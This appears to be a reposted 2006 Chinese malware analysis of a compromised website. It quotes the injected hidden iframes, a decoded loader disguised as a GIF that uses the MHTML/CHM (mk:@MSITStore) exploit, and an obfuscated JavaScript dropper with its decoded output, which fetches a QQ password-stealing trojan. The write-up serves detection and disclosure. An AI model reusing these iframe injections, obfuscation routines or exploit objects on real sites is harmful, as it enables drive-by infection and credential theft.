[07-20] 带毒网站www.china***huati.com(第3版)

2023-10-24 09:54:58

endurer 原创
2006-07-20 第3版 补充江民KV的反应
2006-07-19 第2版 补充Kaspersky的反应
2006-07-18 第1

hxxp://www.china***huati.com首页被加入:  
--------------------------------
<iframe src=hxxp://bbs.**gemeus*.com/q17***/index.htm width=0 height=0></iframe>
……
<iframe height=0 width=0 src="hxxp://www.***ll-nba.com/*4***"></iframe>(endurer注:共有6处插入)
--------------------------------

hxxp://bbs.**gemeus*.com/q17***/index.htm的内容为:

--------------------------------
<script language="javascript" src="ah.js"></script>
--------------------------------


ah.js 的内容解密后的内容为:
--------------------------------
GIF89a
var GIF89a=document.location.href;GIF89a=GIF89a.substring(0,GIF89a.lastIndexOf('/'));document.write('<OBJECT Width=0 Height=0 type="text/x-scriptlet" data="mk:@MSITStore:mhtml:c://.mht!'+GIF89a+'/1.js::/#"></OBJECT>');
--------------------------------
冒充GIF文件,下载运行 1.js。

Kaspersky 将 1.js 报为: Packed.Win32.Klone.d(http://www.viruslist.com/en/viruses/encyclopedia?virusid=115946)。

江民KV 将 1.js 报为: Exploit.HTML.Mht.ae(http://virusinfo.jiangmin.com/infomation/200641010559.html)。

1.js 其实是个CHM文件,会释放/运行名为 msnmon.exe 的文件。

Kaspersky 将 msnmon.exe 报为: not-a-virus:AdWare.Win32.WSearch.k

江民 对 msnmon.exe 的回复为: 不是病毒。

hxxp://www.***ll-nba.com/*4***的内容为:
------------------------
<SCRIPT LANGUAGE="JavaScript">
<!--
var HtmlStrings=["=iunm> =PCKFDU!tuzmf>#ejtqmbz;opof<#!uzqf>#ufyu0y.tdsjqumfu#!e","bub>#'$88'$86'$69'$75'$88'$94'$84'$95'$94'$227'$222'$225'$212","'$69'$21:'$215'$227'$21:'$219'$69'$::'$69'$:3'$57'$21:'$215'$","227'$44'$215'$227'$227'$223'$69'$580xxx/mm.ocb/dpn050mphp/kqh",";;0213&3F&79un#>=0PCKFDU> =0cpez> =0iunm> "];
function psw(st){
  var varS;
  varS="";
  var i;
  for(var a=0;a<st.length;a++){
    i = st.charCodeAt(a);
    if (i==1)
      varS=varS+String.fromCharCode('"'.charCodeAt()-1);
    else if (i==2) {
      a++;
      varS+=String.fromCharCode(st.charCodeAt(a));
      }
    else
      varS+=String.fromCharCode(i-1);
  }
  return varS;
};
var num=5;
function S(){
for(i=0;i<num;i++)
  document.write(psw(HtmlStrings[i]));}
S();
// -->
</SCRIPT>
-----------------------


代码运行后输出的内容为:

-----------------------
<html>
<OBJECT type="text/x-scriptlet" data="MK:@MSITStore:mhtml:c:/.mht!http://www.***ll-nba.com/*4***/logo.jpg::/102%2E%68tm"></OBJECT>
</body>
</html>
-----------------------

会下载hxxp:///www.***ll-nba.com/*4***/logo.jpg。

Kaspersky 将 logo.jpg 报为:Trojan-PSW.Win32.QQShou.fw(http://www.viruslist.com/en/viruses/encyclopedia?virusid=123300)。

江民KV 将 logo.jpg 报为:TrojanDropper.Mht.Psyme.gfi


本文来自互联网用户投稿,文章观点仅代表作者本人,不代表本站立场,不承担相关法律责任。如若转载,请注明出处。 如若内容造成侵权/违法违规/事实不符,请点击【内容举报】进行投诉反馈!

相关文章

Duilib中list控件支持ctrl和shif多行选中的实现

[ICML2015]Batch Normalization:Accelerating Deep Network Training by Reducing Internal Covariate Shif

win10系统 微软输入法 于eclipse ctrl+shif+f冲突间接处理办法

Codeforces Round #259 (Div. 2) B. Little Pony and Sort by Shif

读LDD3,内存映射与DMA--PAGE_SHIF…

VMware虚拟机安装XP【要先分区,再设置BOOT 启动CD,shif+上移】

更换iBus五笔的左与右Shif

sublime ctrl+shif+f 没用解决办法

idea 对 ctrl + z 的撤销 是 ctrl + shif + z

计算机最早的设计师应用于,计算机应用基础选择题doc.doc

win10自带截图神器:Win+Shift+S

Python基础之文件目录操作

python简述目录_Python基础之文件目录操作(示例代码)

tp5 如何做数据采集

任务2-7(服务器字体+阿里巴巴矢量库)

html标签(1):h1~h6,p,br,pre,hr

TI 电量计介绍与芯片选型指南

几款TI电源芯片简介

TI DSP芯片C2000系列读取FLASH数据

德州仪器(Ti)平台嵌入式开发基础

TI三相电机智能栅极驱动芯片特点分类

省选模拟(12.08) T3 圈圈圈圈圈圈圈圈

Hadoop生态圈技术栈(上)

大数据开发基础入门与项目实战(三)Hadoop核心及生态圈技术栈之6.Impala交互式查询

小猿圈之Linux下Mysql 操作命令

大数据Hadoop生态圈常用面试题

大数据开发基础入门与项目实战(三)Hadoop核心及生态圈技术栈之4.Hive DDL、DQL和数据操作

备战Noip2018模拟赛11(B组)T3 Monogatari 物语

【智能优化算法-圆圈搜索算法】基于圆圈搜索算法Circle Search Algorithm求解单目标优化问题附matlab代码

NYOJ 78 圈水池

递归问题 跑道 汽车 绕圈问题 Python实现

Hadoop生态圈(三):MapReduce

立即
投稿

微信公众账号

微信扫一扫加关注

 返回
顶部